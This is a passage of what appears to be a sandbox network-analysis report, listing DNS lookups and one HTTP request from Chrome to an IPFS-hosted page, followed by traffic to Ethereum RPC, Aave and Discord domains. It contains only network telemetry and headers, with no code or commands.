                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.781239033 CEST192.168.2.51.1.1.10xb552Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.781378031 CEST192.168.2.51.1.1.10x95d2Standard query (0)www.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.196038961 CEST192.168.2.51.1.1.10x5960Standard query (0)eth-mainnet.rpc.grove.cityA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.196194887 CEST192.168.2.51.1.1.10x77baStandard query (0)eth-mainnet.rpc.grove.city65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.260194063 CEST192.168.2.51.1.1.10xb97aStandard query (0)apps.aavechan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.260324955 CEST192.168.2.51.1.1.10xf809Standard query (0)apps.aavechan.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.979521990 CEST192.168.2.51.1.1.10x59a1Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.980026007 CEST192.168.2.51.1.1.10x78fdStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:17.666085958 CEST192.168.2.51.1.1.10xa4dStandard query (0)apps.aavechan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:17.666264057 CEST192.168.2.51.1.1.10x958aStandard query (0)apps.aavechan.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.946723938 CEST192.168.2.51.1.1.10xcf4fStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.947037935 CEST192.168.2.51.1.1.10xb1b6Standard query (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.194928885 CEST192.168.2.51.1.1.10x584bStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.196793079 CEST192.168.2.51.1.1.10x5a08Standard query (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.355218887 CEST192.168.2.51.1.1.10xb8aStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.355479002 CEST192.168.2.51.1.1.10xe532Standard query (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.067683935 CEST192.168.2.51.1.1.10x7730Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.068209887 CEST192.168.2.51.1.1.10x91d7Standard query (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.578788996 CEST192.168.2.51.1.1.10xa158Standard query (0)remote-auth-gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.579026937 CEST192.168.2.51.1.1.10x6438Standard query (0)remote-auth-gateway.discord.gg65IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:37.028924942 CEST1.1.1.1192.168.2.50xe88aNo error (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:37.030776024 CEST1.1.1.1192.168.2.50xf3d1No error (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link209.94.90.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:37.030776024 CEST1.1.1.1192.168.2.50xf3d1No error (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link209.94.90.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:39.523758888 CEST1.1.1.1192.168.2.50x86a6No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:39.524252892 CEST1.1.1.1192.168.2.50xd93bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:41.589852095 CEST1.1.1.1192.168.2.50x9ab9No error (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link209.94.90.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:41.589852095 CEST1.1.1.1192.168.2.50x9ab9No error (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link209.94.90.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:41.591043949 CEST1.1.1.1192.168.2.50xce87No error (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:46.896241903 CEST1.1.1.1192.168.2.50xbe9dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:46.896241903 CEST1.1.1.1192.168.2.50xbe9dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:49.032035112 CEST1.1.1.1192.168.2.50xc5fcNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:49.032035112 CEST1.1.1.1192.168.2.50xc5fcNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:57.653897047 CEST1.1.1.1192.168.2.50xa6b5No error (0)api.thegraph.com104.18.40.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:57.653897047 CEST1.1.1.1192.168.2.50xa6b5No error (0)api.thegraph.com172.64.147.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:57.656640053 CEST1.1.1.1192.168.2.50x1b97No error (0)api.thegraph.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:58.931097031 CEST1.1.1.1192.168.2.50xd26eNo error (0)eth-mainnet.rpc.grove.city34.36.6.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.152568102 CEST1.1.1.1192.168.2.50xc6d5No error (0)eth-mainnet.rpc.grove.city34.36.6.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.168812037 CEST1.1.1.1192.168.2.50xbdf7No error (0)rpc.ankr.comcanary.shark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.168812037 CEST1.1.1.1192.168.2.50xbdf7No error (0)canary.shark.multi-rpc.comshark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.168812037 CEST1.1.1.1192.168.2.50xbdf7No error (0)shark.multi-rpc.com173.244.207.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.169363976 CEST1.1.1.1192.168.2.50xf0d9No error (0)rpc.ankr.comcanary.shark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.169363976 CEST1.1.1.1192.168.2.50xf0d9No error (0)canary.shark.multi-rpc.comshark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.849586010 CEST1.1.1.1192.168.2.50x4583No error (0)rpc.flashbots.net104.22.64.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.849586010 CEST1.1.1.1192.168.2.50x4583No error (0)rpc.flashbots.net172.67.36.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.849586010 CEST1.1.1.1192.168.2.50x4583No error (0)rpc.flashbots.net104.22.65.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.855093002 CEST1.1.1.1192.168.2.50xde4dNo error (0)rpc.flashbots.net65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.856383085 CEST1.1.1.1192.168.2.50xe075No error (0)rpc.ankr.comcanary.shark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.856383085 CEST1.1.1.1192.168.2.50xe075No error (0)canary.shark.multi-rpc.comshark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.856383085 CEST1.1.1.1192.168.2.50xe075No error (0)shark.multi-rpc.com173.244.207.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.869164944 CEST1.1.1.1192.168.2.50x17b7No error (0)rpc.ankr.comcanary.shark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.869164944 CEST1.1.1.1192.168.2.50x17b7No error (0)canary.shark.multi-rpc.comshark.multi-rpc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.144422054 CEST1.1.1.1192.168.2.50xc77eNo error (0)app.aave.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.144947052 CEST1.1.1.1192.168.2.50x8c04No error (0)app.aave.com104.26.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.144947052 CEST1.1.1.1192.168.2.50x8c04No error (0)app.aave.com104.26.3.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.144947052 CEST1.1.1.1192.168.2.50x8c04No error (0)app.aave.com172.67.75.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.243731022 CEST1.1.1.1192.168.2.50x53ebNo error (0)eth-mainnet.public.blastapi.io104.22.52.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.243731022 CEST1.1.1.1192.168.2.50x53ebNo error (0)eth-mainnet.public.blastapi.io104.22.53.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.243731022 CEST1.1.1.1192.168.2.50x53ebNo error (0)eth-mainnet.public.blastapi.io172.67.14.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.246139050 CEST1.1.1.1192.168.2.50xb376No error (0)eth-mainnet.public.blastapi.io65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.251486063 CEST1.1.1.1192.168.2.50x9b8dNo error (0)rpc.flashbots.net65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.252552032 CEST1.1.1.1192.168.2.50xc57aNo error (0)rpc.flashbots.net172.67.36.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.252552032 CEST1.1.1.1192.168.2.50xc57aNo error (0)rpc.flashbots.net104.22.65.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.252552032 CEST1.1.1.1192.168.2.50xc57aNo error (0)rpc.flashbots.net104.22.64.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.274709940 CEST1.1.1.1192.168.2.50x654cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.274709940 CEST1.1.1.1192.168.2.50x654cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.927906036 CEST1.1.1.1192.168.2.50xb805No error (0)docs.flashbots.netcname.vercel-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.927906036 CEST1.1.1.1192.168.2.50xb805No error (0)cname.vercel-dns.com76.76.21.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.927906036 CEST1.1.1.1192.168.2.50xb805No error (0)cname.vercel-dns.com76.76.21.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.928538084 CEST1.1.1.1192.168.2.50xc42No error (0)docs.flashbots.netcname.vercel-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.521838903 CEST1.1.1.1192.168.2.50x6f0eNo error (0)cloudflare-eth.com104.18.10.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.521838903 CEST1.1.1.1192.168.2.50x6f0eNo error (0)cloudflare-eth.com104.18.11.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.523638964 CEST1.1.1.1192.168.2.50xfdf4No error (0)cloudflare-eth.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.525862932 CEST1.1.1.1192.168.2.50x3a37No error (0)eth-mainnet.public.blastapi.io104.22.52.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.525862932 CEST1.1.1.1192.168.2.50x3a37No error (0)eth-mainnet.public.blastapi.io104.22.53.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.525862932 CEST1.1.1.1192.168.2.50x3a37No error (0)eth-mainnet.public.blastapi.io172.67.14.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.527035952 CEST1.1.1.1192.168.2.50xced0No error (0)eth-mainnet.public.blastapi.io65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:06.645289898 CEST1.1.1.1192.168.2.50xd807No error (0)app.aave.com104.26.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:06.645289898 CEST1.1.1.1192.168.2.50xd807No error (0)app.aave.com104.26.3.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:06.645289898 CEST1.1.1.1192.168.2.50xd807No error (0)app.aave.com172.67.75.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:06.645351887 CEST1.1.1.1192.168.2.50x5150No error (0)app.aave.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.162259102 CEST1.1.1.1192.168.2.50x3d6fNo error (0)cloudflare-eth.com104.18.10.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.162259102 CEST1.1.1.1192.168.2.50x3d6fNo error (0)cloudflare-eth.com104.18.11.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.165263891 CEST1.1.1.1192.168.2.50x6c11No error (0)cloudflare-eth.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.789172888 CEST1.1.1.1192.168.2.50xb552No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.789172888 CEST1.1.1.1192.168.2.50xb552No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.789489031 CEST1.1.1.1192.168.2.50x95d2No error (0)www.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.214879036 CEST1.1.1.1192.168.2.50x5960No error (0)eth-mainnet.rpc.grove.city34.36.6.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.317193985 CEST1.1.1.1192.168.2.50xf809No error (0)apps.aavechan.comcname.vercel-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.336309910 CEST1.1.1.1192.168.2.50xb97aNo error (0)apps.aavechan.comcname.vercel-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.336309910 CEST1.1.1.1192.168.2.50xb97aNo error (0)cname.vercel-dns.com76.76.21.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.336309910 CEST1.1.1.1192.168.2.50xb97aNo error (0)cname.vercel-dns.com76.76.21.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:16.986460924 CEST1.1.1.1192.168.2.50x59a1No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:17.700803995 CEST1.1.1.1192.168.2.50xa4dNo error (0)apps.aavechan.comcname.vercel-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:17.700803995 CEST1.1.1.1192.168.2.50xa4dNo error (0)cname.vercel-dns.com76.76.21.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:17.700803995 CEST1.1.1.1192.168.2.50xa4dNo error (0)cname.vercel-dns.com76.76.21.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:17.701123953 CEST1.1.1.1192.168.2.50x958aNo error (0)apps.aavechan.comcname.vercel-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.954240084 CEST1.1.1.1192.168.2.50xcf4fNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.954240084 CEST1.1.1.1192.168.2.50xcf4fNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.954240084 CEST1.1.1.1192.168.2.50xcf4fNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.954240084 CEST1.1.1.1192.168.2.50xcf4fNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.954240084 CEST1.1.1.1192.168.2.50xcf4fNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:29.954854965 CEST1.1.1.1192.168.2.50xb1b6No error (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:30.043493986 CEST1.1.1.1192.168.2.50xe686No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:30.043493986 CEST1.1.1.1192.168.2.50xe686No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.201422930 CEST1.1.1.1192.168.2.50x584bNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.201422930 CEST1.1.1.1192.168.2.50x584bNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.201422930 CEST1.1.1.1192.168.2.50x584bNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.201422930 CEST1.1.1.1192.168.2.50x584bNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.201422930 CEST1.1.1.1192.168.2.50x584bNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:33.203052998 CEST1.1.1.1192.168.2.50x5a08No error (0)discord.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:48.851030111 CEST1.1.1.1192.168.2.50xe72eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:48.851030111 CEST1.1.1.1192.168.2.50xe72eNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.362227917 CEST1.1.1.1192.168.2.50xe532No error (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.362416029 CEST1.1.1.1192.168.2.50xb8aNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.362416029 CEST1.1.1.1192.168.2.50xb8aNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.362416029 CEST1.1.1.1192.168.2.50xb8aNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.362416029 CEST1.1.1.1192.168.2.50xb8aNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:50.362416029 CEST1.1.1.1192.168.2.50xb8aNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.074505091 CEST1.1.1.1192.168.2.50x7730No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.074505091 CEST1.1.1.1192.168.2.50x7730No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.074505091 CEST1.1.1.1192.168.2.50x7730No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.074505091 CEST1.1.1.1192.168.2.50x7730No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.074505091 CEST1.1.1.1192.168.2.50x7730No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:51.074712992 CEST1.1.1.1192.168.2.50x91d7No error (0)cdn.discordapp.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:53.112776041 CEST1.1.1.1192.168.2.50x88adNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:53.112776041 CEST1.1.1.1192.168.2.50x88adNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.585901022 CEST1.1.1.1192.168.2.50xa158No error (0)remote-auth-gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.585901022 CEST1.1.1.1192.168.2.50xa158No error (0)remote-auth-gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.585901022 CEST1.1.1.1192.168.2.50xa158No error (0)remote-auth-gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.585901022 CEST1.1.1.1192.168.2.50xa158No error (0)remote-auth-gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.585901022 CEST1.1.1.1192.168.2.50xa158No error (0)remote-auth-gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:13:03.586857080 CEST1.1.1.1192.168.2.50x6438No error (0)remote-auth-gateway.discord.gg65IN (0x0001)false
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.549710209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC717OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:37 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028633
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e3f7bd6043dd-EWR
